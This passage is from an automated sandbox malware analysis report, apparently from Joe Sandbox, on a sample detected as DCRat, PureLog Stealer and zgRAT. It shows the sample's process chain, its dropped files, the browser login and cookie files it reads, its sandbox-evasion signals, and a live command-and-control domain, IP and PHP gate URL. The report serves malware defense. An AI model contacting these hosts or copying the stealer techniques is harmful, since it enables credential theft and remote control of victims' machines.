                              Source: C:\ProgramData\dbg\conhost.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\dbg\conhost.exeProcess token adjusted: Debug
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess token adjusted: Debug
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess token adjusted: Debug
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\dbg\conhost.exeProcess token adjusted: Debug
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\FontHost\ContainerAgentWinSession.exe "C:\FontHost/ContainerAgentWinSession.exe"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.000000000293C000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1",5,1,"","user","051829","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\FontHost","65BVNK (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","051829","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\FontHost","65BVNK (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                              Source: C:\FontHost\ContainerAgentWinSession.exeQueries volume information: C:\FontHost\ContainerAgentWinSession.exe VolumeInformationJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\ProgramData\dbg\conhost.exeQueries volume information: C:\ProgramData\dbg\conhost.exe VolumeInformation
                              Source: C:\ProgramData\dbg\conhost.exeQueries volume information: C:\ProgramData\dbg\conhost.exe VolumeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeQueries volume information: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe VolumeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exeQueries volume information: C:\FontHost\ContainerAgentWinSession.exe VolumeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exeQueries volume information: C:\FontHost\ContainerAgentWinSession.exe VolumeInformation
                              Source: C:\ProgramData\dbg\conhost.exeQueries volume information: C:\ProgramData\dbg\conhost.exe VolumeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe VolumeInformation
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ContainerAgentWinSession.exe PID: 5344, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: NjWYKcLujkVoPzemFBeg.exe PID: 6968, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7260, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: Nerolore.exe, type: SAMPLE
                              Source: Yara matchFile source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: Nerolore.exe, type: SAMPLE
                              Source: Yara matchFile source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ContainerAgentWinSession.exe PID: 5344, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: NjWYKcLujkVoPzemFBeg.exe PID: 6968, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7260, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: Nerolore.exe, type: SAMPLE
                              Source: Yara matchFile source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: Nerolore.exe, type: SAMPLE
                              Source: Yara matchFile source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information11
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		11
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		1
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory135
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		3
                              Obfuscated Files or Information                              		Security Account Manager541
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron21
                              Registry Run Keys / Startup Folder                              		21
                              Registry Run Keys / Startup Folder                              		14
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets461
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                              Masquerading                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job461
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498674 Sample: Nerolore.exe Startdate: 25/08/2024 Architecture: WINDOWS Score: 100 84 373292cm.nyashka.top 2->84 86 15.164.165.52.in-addr.arpa 2->86 92 Multi AV Scanner detection for domain / URL 2->92 94 Suricata IDS alerts for network traffic 2->94 96 Found malware configuration 2->96 98 17 other signatures 2->98 11 Nerolore.exe 3 6 2->11         started        15 NjWYKcLujkVoPzemFBeg.exe 2->15         started        18 conhost.exe 2->18         started        20 5 other processes 2->20 signatures3 process4 dnsIp5 64 C:\FontHost\ContainerAgentWinSession.exe, PE32 11->64 dropped 66 C:\...\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe, data 11->66 dropped 106 Detected unpacking (changes PE section rights) 11->106 108 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->108 110 Hides threads from debuggers 11->110 22 wscript.exe 1 11->22         started        88 373292cm.nyashka.top 80.211.144.156, 49712, 49713, 49716 ARUBA-ASNIT Italy 15->88 68 C:\Users\user\Desktop\xvosSKAI.log, PE32 15->68 dropped 70 C:\Users\user\Desktop\goYNyXVt.log, PE32 15->70 dropped 72 C:\Users\user\Desktop\ddCMyFqs.log, PE32 15->72 dropped 74 2 other malicious files 15->74 dropped 112 Antivirus detection for dropped file 15->112 114 Multi AV Scanner detection for dropped file 15->114 116 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->116 120 2 other signatures 15->120 118 Machine Learning detection for dropped file 18->118 file6 signatures7 process8 signatures9 100 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->100 25 cmd.exe 1 22->25         started        process10 process11 27 ContainerAgentWinSession.exe 10 34 25->27         started        31 conhost.exe 25->31         started        file12 76 C:\Users\user\Desktop\vBGRGbPj.log, PE32 27->76 dropped 78 C:\Users\user\Desktop\XwBnJZqg.log, PE32 27->78 dropped 80 C:\Users\user\Desktop\ONhXawky.log, PE32 27->80 dropped 82 9 other malicious files 27->82 dropped 122 Antivirus detection for dropped file 27->122 124 Multi AV Scanner detection for dropped file 27->124 126 Creates an undocumented autostart registry key 27->126 128 4 other signatures 27->128 33 csc.exe 4 27->33         started        37 csc.exe 4 27->37         started        39 cmd.exe 27->39         started        41 18 other processes 27->41 signatures13 process14 file15 60 C:\Program Files (x86)\...\msedge.exe, PE32 33->60 dropped 90 Infects executable files (exe, dll, sys, html) 33->90 43 cvtres.exe 1 33->43         started        46 conhost.exe 33->46         started        62 C:\Windows\...\SecurityHealthSystray.exe, PE32 37->62 dropped 48 conhost.exe 37->48         started        50 cvtres.exe 1 37->50         started        52 conhost.exe 39->52         started        54 chcp.com 39->54         started        56 w32tm.exe 39->56         started        58 conhost.exe 39->58         started        signatures16 process17 signatures18 102 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->102 104 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 43->104

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Nerolore.exe79%ReversingLabsWin32.Trojan.DCRat
                              Nerolore.exe67%VirustotalBrowse
                              Nerolore.exe100%AviraVBS/Runner.VPG
                              Nerolore.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe100%AviraHEUR/AGEN.1323342
                              C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe100%AviraVBS/Runner.VPG
                              C:\Users\user\Desktop\XwBnJZqg.log100%AviraTR/PSW.Agent.qngqt
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\GeIICmFp.log100%AviraTR/PSW.Agent.qngqt
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe100%AviraHEUR/AGEN.1323342
                              C:\ProgramData\dbg\conhost.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\ONhXawky.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\xvosSKAI.log100%AviraHEUR/AGEN.1300079
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat100%AviraBAT/Delbat.C
                              C:\FontHost\ContainerAgentWinSession.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe100%Joe Sandbox ML
                              C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\XwBnJZqg.log100%Joe Sandbox ML
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\GeIICmFp.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe100%Joe Sandbox ML
                              C:\ProgramData\dbg\conhost.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\vBGRGbPj.log100%Joe Sandbox ML
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\ddCMyFqs.log100%Joe Sandbox ML
                              C:\FontHost\ContainerAgentWinSession.exe100%Joe Sandbox ML
                              C:\FontHost\ContainerAgentWinSession.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\FontHost\ContainerAgentWinSession.exe55%VirustotalBrowse
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe55%VirustotalBrowse
                              C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe55%VirustotalBrowse
                              C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe55%VirustotalBrowse
                              C:\ProgramData\dbg\conhost.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\ProgramData\dbg\conhost.exe55%VirustotalBrowse
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe55%VirustotalBrowse
                              C:\Users\user\Desktop\EeOHqUfQ.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\EeOHqUfQ.log27%VirustotalBrowse
                              C:\Users\user\Desktop\EmyZUDGW.log25%ReversingLabs
                              C:\Users\user\Desktop\EmyZUDGW.log29%VirustotalBrowse
                              C:\Users\user\Desktop\GeIICmFp.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\GeIICmFp.log69%VirustotalBrowse
                              C:\Users\user\Desktop\LtUgLbtj.log25%ReversingLabs
                              C:\Users\user\Desktop\LtUgLbtj.log29%VirustotalBrowse
                              C:\Users\user\Desktop\ONhXawky.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\ONhXawky.log22%VirustotalBrowse
                              C:\Users\user\Desktop\XwBnJZqg.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\XwBnJZqg.log69%VirustotalBrowse
                              C:\Users\user\Desktop\ddCMyFqs.log8%ReversingLabs
                              C:\Users\user\Desktop\ddCMyFqs.log11%VirustotalBrowse
                              C:\Users\user\Desktop\goYNyXVt.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\goYNyXVt.log27%VirustotalBrowse
                              C:\Users\user\Desktop\vBGRGbPj.log8%ReversingLabs
                              C:\Users\user\Desktop\vBGRGbPj.log11%VirustotalBrowse
                              C:\Users\user\Desktop\xvosSKAI.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              SourceDetectionScannerLabelLink
                              373292cm.nyashka.top19%VirustotalBrowse
                              15.164.165.52.in-addr.arpa0%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                              http://www.enigmaprotector.com/openU0%VirustotalBrowse
                              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                              http://373292cm.nyashka.top100%Avira URL Cloudmalware
                              http://www.enigmaprotector.com/openU0%Avira URL Cloudsafe
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                              http://373292cm.nyashka.top/100%Avira URL Cloudmalware
                              http://www.enigmaprotector.com/0%Avira URL Cloudsafe
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php100%Avira URL Cloudmalware
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                              http://373292cm.nyPr80%Avira URL Cloudsafe
                              http://373292cm.nyashka.top/19%VirustotalBrowse
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                              http://373292cm.nyashka.top19%VirustotalBrowse
                              http://www.enigmaprotector.com/0%VirustotalBrowse
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php18%VirustotalBrowse
                              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              373292cm.nyashka.top
                              		80.211.144.156
                              		truetrueunknown
                              15.164.165.52.in-addr.arpa
                              		unknown
                              		unknownfalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phptrue
                              • 18%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabNjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
